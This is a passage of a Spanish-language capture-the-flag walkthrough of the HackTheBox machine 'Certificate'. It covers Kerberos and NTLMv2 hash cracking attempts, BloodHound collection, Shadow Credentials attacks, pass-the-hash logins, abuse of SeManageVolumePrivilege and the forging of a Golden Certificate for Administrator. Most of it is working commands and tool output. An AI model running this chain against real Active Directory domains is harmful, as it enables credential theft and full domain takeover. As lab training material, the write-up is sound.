$krb5tgs$23$*Lion.SK$CERTIFICATE.HTB$cifs/DC01*$474135718c701dd35c028464dd7b8640$57f1c27dbf40aca3f01a36f3c335f379e8e9b59a7eab19e0fec88d368c80e928471612b36b1c082b19296523c7138dda4817e181351e85803ffece2bd060b46dad6a33d7b12dbff20ef3dad62809d7afc59820b99db29425b8974265978f16cec610aede84645a891f70b3670e2cf32031819098419cbd7578e56360327925dafaa92c79b305168fbbbf7a9d5003893b3c0eeeb2abbb15d0507309b8d58bdf61d81e2180aeb93de3b8d51fe4e0cd0bbed5a385bea24b593bc974cd01c097f7c03922bcbe4323e8d5f8496cdf41e1fe8b71032fabc30a0edceb63c552430c6779ba8ccb3341c6f3503083ee101652a7a9e167aceefe5c9d6809a80114823ab302ba153794252f008973e2a6102f945ded254852efd217a0d063bb5bc8cc69f6a2042a11874367448cfdb16de420ad47fd1a215ff350e4081c9435d8718d40b51e012f0dbac9dfda6ffaaba0ab7c9fd0b77851973feee6f81a3ddcb6b63c034a2d2593be2525213d322e842febbbac57165ec63d65f7122a53ad6c419b1e0ff6f39abf6226886e3078f910212f94ff43789e7f8ccc1eb34c4fa713322424e509f39fe805daab2f1e182da8d1cce885938eb9084796156fbda10e6e14de6539983abff210b514aa1bed72d51b70515c7d4a0cd251e165fa28a07c5490b8b9f6056501cbc3e134d1464bf1ef84b239d1145d197cf2d0d9e91e02ad39bd17dfeab5a1b795d99f57150461f44135352d6145c7d868c6833ed0afa9ee73c9012a8b9ac2f704c40b1fbc6380d72d657e122bcb152bbcbea682a8b87549a4ca9fc2c069f3b9fdfc7752fa69a439f7abfa8332ecc5d4d08aa84ac70ac7a38ba8976e7e1f029bab290f6c6bc774548ad7e924d2ebca8a995772805c780c92f4725201890ed149554b6cc7afeaa0f17a091f3228b3d98a97fd8b6e0b904b14c729c96faf653370d71ca90f5f07bdf644bb08d7855393d37eb9a9f907462775fbdfe9811c9ef7789735e42a99f90f2efb627a7d564ba8ea05b6caa01fec28df4b34d836dd7604a2ee9a664b1f8d42c7602dd15beaa64d1be3502a7bd15949c0270d1f65385fcdac6715262ef6d764a41f4507a59bbdebeb0f2d682746535c3141820b29244001d2888b2f2060f51b8e1a675924cc5d4d083cdba184332f74ac30c63fb18c8216cc001ea6ea6921144db7a44920bd5c7d1ab41e0ce8eb0041f73feb96d8c45927ae894188e3889e84745c0bc1e41357979564e0871e5f4ecf3a24010846d1af723e4aa20483374f6dcf039c8d6baf8dc2382c20a6b684069a407087a1eea51143c9d849aa32d18e2f2313a4f734b2c58ee4876240613851d4359bfe9d0df5dba8c073abae147a9ef13b6a14c16d2eaeca65d4d69545aabe492d08852fdc34ee6e708a517ef893ea9492d828f1343e0733f02b542db6ad52797eab5fe0582927f0baeeee93faf830fad3567c4e07eb1042579d97341ecbdfd1dbf783c7e8929156640913e79238e71b643b171573fbec06c28b3670d316dc06c1c0bc446e7233b706c29ba248f2dc628c766c464149e0da20263e6dd19c655801ded5b8abb75e9ffec539faf8d54168ddee15c07c28f80f7680c9435ae3d008107e27943692717ae1aaf7b96fdab4ddbe06288ff18a3e38673cfa561db3590889
$krb5tgs$23$*Lion.SK$CERTIFICATE.HTB$krbtgt/CERTIFICATE.HTB*$8e00afdd5516b1538deea0ebecf3a59e$88ab53fa94dcbe665ebbc2718cee28d710f624ee4c23c57c88540a3e6899595e5be26a32f537340eeb854d4ff3df0d0a63960455b5b0b8122ac445378ee00e40eef3f0bb3773ca1d451da7e307bbf0c0cca8b5b31eb6dddedd73c7f3f5b361a829b40d129142a230080341138b0ba305b7839654e85140e156badcb394bc984661e6e5ef567ee56faacf22c53ce6a60391edf5b32ce1db0fc36fc96135076f538cf9165873d3ee84c2b29618874865caba81c01797c9f2c64fc2be073961fb2f877abbc70c318ad40f4f4f74786b39ea85065b6ee840f5e09c53a15231bd8f3a081f45891928db92dcb8bd137a3659e9492e842daa6e85c70c1bc0755f537ba884851eeacd3a4acf9c92e9d4073597148953b3b3ab7059d1c548b818b3363f23f46f2d01ff8b0451049c19129b684c16242e16e91fbe3dc64559a8ab9dfb7652d8d77d2b1957ef212b407a8464460b6eeac6dff47cc110fe66db6e7e66d421ca3a87247f16cd5f88914a3d90a59e916589a5b8e45ae36326e4a3d1e5bc880f5b143edc46db7cd1e4300f365dcee4622823af2e38fed63acd68d848d7cc0ab05b367420270d10211d50c316e3cb9cdfb60cbe3686f4bf246dc924c5c22035113b26489ba711b4d65e08bb33ee9994ee8be8ec804fb466f66673d085fd12ae40bd4f63f0141a048409225bb230da3cb7bf58be07313823ab684fd3f574024f3cc197b77a3be109065a87c218c51c946ff3f2588e3312f0c81e531e5c872d4d31345bd29feb729597f10eee836f1b3bd8e27beb1f94502b87ae3b918c01a79295c00e7c720195e855d1bc41d929d22ab68e08805d573fc561839f1648e1fb03c1fbaa8f6ad3bdef3a497668d520c2f615b6dd6049a47fffa483804be607cffc97c1563f37805beb5c12ce4865e3207fb299ef94059caf429e61671ce83e3a1e3b00b6f656d2e83c26cfb19093de55fb0a2bb217f2388f37543a50bfa441f5bde203a4d7506ef2430ab2a2456cfb1395a5798aa44610f3d74cfe4e0f0eb717bd12e154444697bf2444cfaedd41a362e2fbb7aaba8aa4ee24d78ba25f915dabf16c3ffc05c5f8f32948c0690287553e3c8d47466e55474ec6dcac922e2906ebb407859be7ca6711a0d3f501583b5b3466126afae227dd529942a404233bb3453ae541624540c1061b850263da6c58f0e8f2a86b66d5e72c780c147ae04e5ec758e5c1c2d0feb279684d8b78e961e336a6186972144d5233da0f948e9190f9aebb7c2c9dd11ef367000e52903d9f2aa1688869ba77a3bedb786e315cbdd91ed7c054ccf9a0e7e716411fba6760b807ed9c6eb548a84b2f597f41bb34901a5e4c016aa7e41165266ba5c17504b8b99d488e7c1fa5d20691cc85822f9dae33e8144670ab525ca1698aa9ac37f42d76f7f6d6fb0a48069d3d4f2cbf61b4dfd14da10717b9fbb95071782ec6b19ad01387ad5b0d35a8b79aa814be3a0241c64427a7fe5a565617a38a8019ea72644762bcecb8d6c6a3d698cbdf73dfc553bdada42b1e510b21f004eb1cd4ffd867e2783178529f93c40472

Intentamos realizar el crackeo de estas hashes pero ninguno se encontraba en el wordlist rockyou.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
❯ john as_rep.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 DONE (2025-06-06 00:32) 0g/s 1522Kp/s 1522Kc/s 1522KC/s !)(OPPQR..*7¡Vamos!
Session completed. 
❯ john tgs_rep.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 DONE (2025-06-06 00:32) 0g/s 1775Kp/s 3550Kc/s 3550KC/s !!12Honey..*7¡Vamos!
Session completed. 
PS C:\Users\sckull\Documents\hashcat-6.2.6> .\hashcat.exe -m 19900 ..\hash\certificate_hash_pcap rockyou.txt
hashcat (v6.2.6) starting

[... snip ...]
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 19900 (Kerberos 5, etype 18, Pre-Auth)
Hash.Target......: $krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e5...e852f0
Time.Started.....: Fri Jun 06 00:36:03 2025 (39 secs)
Time.Estimated...: Fri Jun 06 00:36:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   366.8 kH/s (5.57ms) @ Accel:4 Loops:256 Thr:512 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3840-4095
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[247472697374656e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 53c Fan:  0% Util: 71% Core:2760MHz Mem:8250MHz Bus:8

Started: Fri Jun 06 00:36:02 2025
Stopped: Fri Jun 06 00:36:43 2025
PS C:\Users\sckull\Documents\hashcat-6.2.6>

De la misma forma para Hashes NTLM con NTLMRawUnHide, no encontramos un valor de contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
❯ ./NTLMRawUnHide.py -i WS-01_PktMon.pcap -o out.txt
                                                              /%(
                               -= Find NTLMv2 =-          ,@@@@@@@@&
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
         (@@@@@@@@@@@(       -= NTLMRawUnHide.py =-    *@@@@@@@@@@@@@@@.
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
 @@@@@@@/*//,                                                            .,,,**
   .,,  ...
                                    .#@@@@@@@(.
                                   /@@@@@@@@@@@&
                                   .@@@@@@@@@@@*
                                     .(&@@@%/.  ..
                               (@@&     %@@.   .@@@,
                          /@@#          @@@,         %@&
                               &@@&.    @@@/    @@@#
                          .    %@@@(   ,@@@#    @@@(     ,
                         *@@/         .@@@@@(          #@%
                          *@@%.      &@@@@@@@@,      /@@@.
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
                              .%@@@@%,        /%@@@&(.


Searching WS-01_PktMon.pcap for NTLMv2 hashes...
Writing output to: out.txt

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 0f18018782d74f81 

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 0f18018782d74f81 

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : WS-01 
    > Username               : Administrator 
    > Workstation            : WS-01 

NTLMv2 Hash recovered:
Administrator::WS-01:0f18018782d74f81:3ff29ba4b51e86ed1065c438b6713f28:01010000000000000588e3da922edb012a49d5aaa4eeea0c00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001e00630065007200740069006600690063006100740065002e006800740062000300280044004300300031002e00630065007200740069006600690063006100740065002e0068007400620005001e00630065007200740069006600690063006100740065002e00680074006200070008000588e3da922edb0106000400020000000800300030000000000000000000000000300000dc8f08a3fced11be77c988c86f35837e8ec242f6f5e1d65ec5247e3a87d8fe580a001000000000000000000000000000000000000900120063006900660073002f0044004300300031000000000000000000

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : WS-01 
    > Username               : Administrator 
    > Workstation            : WS-01 

Server Challenge not found... can't create crackable hash :-/

[... snip ...]

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : WS-01 
    > Username               : Administrator 
    > Workstation            : WS-01 

Server Challenge not found... can't create crackable hash :-/

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : WS-01 
    > Username               : Administrator 
    > Workstation            : WS-01 

Server Challenge not found... can't create crackable hash :-/

1
2
3
4
5
6
7
8
❯ john out.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 23 password hashes with 23 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:26 DONE (2025-06-06 00:40) 0g/s 166131p/s 3821Kc/s 3821KC/s !)(OPPQR..*7¡Vamos!
Session completed. 

Bloodhound & Analysis

Obtuvimos informacion para bloodhound por medio de netexec con la flag --bloodhound.

1
2
3
4
5
6
7
❯ netexec ldap 10.10.11.71 -u sara.b -p 'Blink182' --dns-server 10.10.11.71 --bloodhound --collection All
LDAP        10.10.11.71     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
LDAP        10.10.11.71     389    DC01             [+] certificate.htb\sara.b:Blink182 
LDAP        10.10.11.71     389    DC01             Resolved collection methods: group, container, acl, rdp, localadmin, dcom, psremote, session, objectprops, trusts
LDAP        10.10.11.71     389    DC01             Done in 00M 16S
LDAP        10.10.11.71     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.71_2025-06-02_204732_bloodhound.zip

Sara.B

Sara.B tiene permiso GenericAll a la mayoria de Grupos, Usuarios y Workstation en el dominio a traves del grupo Account Operators. Para los grupos, es posible que sara.b sea miembro de cualquier grupo asi como tambien agregar a cualquier usuario a cualquier grupo. En el caso de los Usuarios y Workstation, se puede realizar Shadow Attack para obtener el hash de cada uno de estos.

image

Remote Management Users

Observamos dos usuarios en el grupo Remote Management Users: Lion.Sk y Ryan.K. Y, miembros indirectos a traves de Help Desk otros cuatro.

image

User - Lion.Sk

Como sabemos Sara.B tiene acceso a casi cualquier usuario, realizamos Shadow Attack con certipy para los miembros directos de Remote Management Users.

Shadow Credentials Attack

Especificamos al usuario Lion.Sk en certipy, logrando obtener su hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# lion.sk
❯ faketime -f +8h certipy-ad shadow auto -u sara.b -p Blink182 -account lion.sk -dc-ip 10.10.11.71 -dc-host dc01.certificate.htb -ns 10.10.11.71
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'Lion.SK'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f56d4524-934d-049f-8481-3364cfdd98ce'
[*] Adding Key Credential with device ID 'f56d4524-934d-049f-8481-3364cfdd98ce' to the Key Credentials for 'Lion.SK'
[*] Successfully added Key Credential with device ID 'f56d4524-934d-049f-8481-3364cfdd98ce' to the Key Credentials for 'Lion.SK'
[*] Authenticating as 'Lion.SK' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'lion.sk@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'lion.sk.ccache'
[*] Wrote credential cache to 'lion.sk.ccache'
[*] Trying to retrieve NT hash for 'lion.sk'
[*] Restoring the old Key Credentials for 'Lion.SK'
[*] Successfully restored the old Key Credentials for 'Lion.SK'
[*] NT hash for 'Lion.SK': 3b24c391862f4a8531a245a0217708c4

Accedimos por medio de evil-winrm donde encontramos la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ evil-winrm -i certificate.htb -u lion.sk -H 3b24c391862f4a8531a245a0217708c4
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Lion.SK\Documents> dir ../Desktop


    Directory: C:\Users\Lion.SK\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/2/2025   5:23 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Lion.SK\Documents> cat ../Desktop/user.txt
0ec3c9c1847452e0afdcadb4f0125c47
*Evil-WinRM* PS C:\Users\Lion.SK\Documents>

User - Ryan.K

Ejecutamos el mismo ataque para el usuario ryan.k.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# ryan.k
❯ faketime -f +8h certipy-ad shadow auto -u sara.b -p Blink182 -account ryan.k -dc-ip 10.10.11.71 -dc-host dc01.certificate.htb -ns 10.10.11.71
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'Ryan.K'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4b3fc8d5-4e61-2c0e-f148-2b5e6bce99e0'
[*] Adding Key Credential with device ID '4b3fc8d5-4e61-2c0e-f148-2b5e6bce99e0' to the Key Credentials for 'Ryan.K'
[*] Successfully added Key Credential with device ID '4b3fc8d5-4e61-2c0e-f148-2b5e6bce99e0' to the Key Credentials for 'Ryan.K'
[*] Authenticating as 'Ryan.K' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Restoring the old Key Credentials for 'Ryan.K'
[*] Successfully restored the old Key Credentials for 'Ryan.K'
[*] NT hash for 'Ryan.K': 539259e25a0361ec4a227dd9894719f6

Encontramos que este usuario tiene el privilegio SeManageVolumePrivilege.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
❯ evil-winrm -i certificate.htb -u ryan.k -H 539259e25a0361ec4a227dd9894719f6
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled
*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Abuse SeManageVolume

Es posible abusar de este privilegio a traves de SeManageVolumeExploit, este exploit realiza un cambio de permisos de Administrador a Usuario (S-1-5-32-544 -> S-1-5-32-545) en C:\ recursivamente, es decir a todos los archivos y directorios.

Subimos el exploit mediante upload de evil-winrm.

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> upload SeManageVolumeExploit.exe
                                        
Info: Uploading /home/kali/htb/certificate/SeManageVolumeExploit.exe to C:\Users\Ryan.K\Documents\SeManageVolumeExploit.exe
                                        
Data: 16384 bytes of 16384 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Ejecutamos el exploit y observamos que se realizaron un numero de cambios, con ello logramos acceder al directorio de administrador.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> .\SeManageVolumeExploit.exe
Entries changed: 845

DONE

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> dir C:/Users/Administrator/Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/6/2025   5:31 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Sin embargo en el caso de la flag root.txt no es posible realizar su lectura incluso con full acceso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> cat C:/Users/Administrator/Desktop/root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ cat C:/Users/Administrator/Desktop/root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> icacls C:/Users/Administrator/Desktop/root.txt
C:/Users/Administrator/Desktop/root.txt CERTIFICATE\Administrator:(F)
                                        NT AUTHORITY\SYSTEM:(I)(F)
                                        BUILTIN\Users:(I)(F)
                                        CERTIFICATE\Administrator:(I)(F)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> icacls C:/Users/Administrator/Desktop/
C:/Users/Administrator/Desktop/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                BUILTIN\Users:(I)(OI)(CI)(F)
                                CERTIFICATE\Administrator:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 

Privesc via Golden Certificate

A traves de SeManageVolume logramos enumerar el directorio de administrador donde observamos que existe un certificado en su “repositorio” ‘personal’.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> dir C:\users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates


    Directory: C:\users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a--s-         4/8/2025  10:54 PM           1115 6791EAD2E9563E30329A252DCD7DB41502B50150


*Evil-WinRM* PS C:\Users\Ryan.K\Documents> dir C:\users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Keys


    Directory: C:\users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Keys


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a--s-         4/8/2025  10:54 PM            248 9E48B4001DB2928470DA66DDBFA74B0D0B7A2537


*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Ademas vemos que tambien tenemos acceso a las claves privadas de la maquina, con esto es posible acceder a certificados a los cuales anteriormente no se tenian acceso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> dir C:/programdata/microsoft/Crypto/RSA/MachineKeys/


    Directory: C:\programdata\microsoft\Crypto\RSA\MachineKeys


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a--s-        11/3/2024   7:24 PM           2269 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
-a--s-        11/3/2024   8:03 PM           2232 6de9cb26d2b98c01ec4e9e8b34824aa2_7989b711-2e3f-4107-9aae-fb8df2e3b958
-a--s-        11/3/2024   8:03 PM           2222 76944fb33636aeddb9590521c2e8815a_7989b711-2e3f-4107-9aae-fb8df2e3b958
-a--s-        11/3/2024   8:03 PM           2241 d6d986f09a1ee04e24c949879fdb506c_7989b711-2e3f-4107-9aae-fb8df2e3b958


*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Si listando los certificados dentro del repositorio de Ryan.K encontramos el Certificado CA (Certificate Authority).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
*Evil-WinRM* PS C:\users\ryan.k\documents> certutil -Store My
My "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset

================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset

================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.
*Evil-WinRM* PS C:\users\ryan.k\documents>

Export CA

Aparentemente existe algun tipo de “Cronjob” que restaura permisos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -p 123 -exportPFX My 75b2f4bbf31f108945147b466131bdca file.pfx
My "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -exportPFX command FAILED: 0x80090016 (-2146893802 NTE_BAD_KEYSET)
CertUtil: Keyset does not exist
*Evil-WinRM* PS C:\Users\Ryan.K\Documents>

Tras ejecutar nuevamente SeManageVolumeExploit logramos exportar el certificado en formato PFX.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> .\SeManageVolumeExploit.exe
Entries changed: 859

DONE

*Evil-WinRM* PS C:\users\ryan.k\documents> certutil -p 123 -exportPFX My 75b2f4bbf31f108945147b466131bdca file.pfx
My "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\users\ryan.k\documents> dir


    Directory: C:\users\ryan.k\documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/5/2025   3:56 AM           2675 file.pfx


*Evil-WinRM* PS C:\users\ryan.k\documents>

Golden Certificate

Con el certificado CA construimos (forge) un certificado para el usuario administrador especificando UPN y Subject.

1
2
3
4
5
6
❯ certipy-ad forge -ca-pfx "file.pfx" -ca-password password -upn "administrator@certificate.htb" -subject "CN=Administrator,CN=Users,DC=CERTIFICATE,DC=HTB"
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'

Utilizamos el certificado anterior para autenticarnos lo cual nos permitio obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
❯ faketime -f +8h certipy-ad auth -pfx administrator_forged.pfx -dc-ip 10.10.11.71 -username Administrator -domain certificate.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@certificate.htb'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
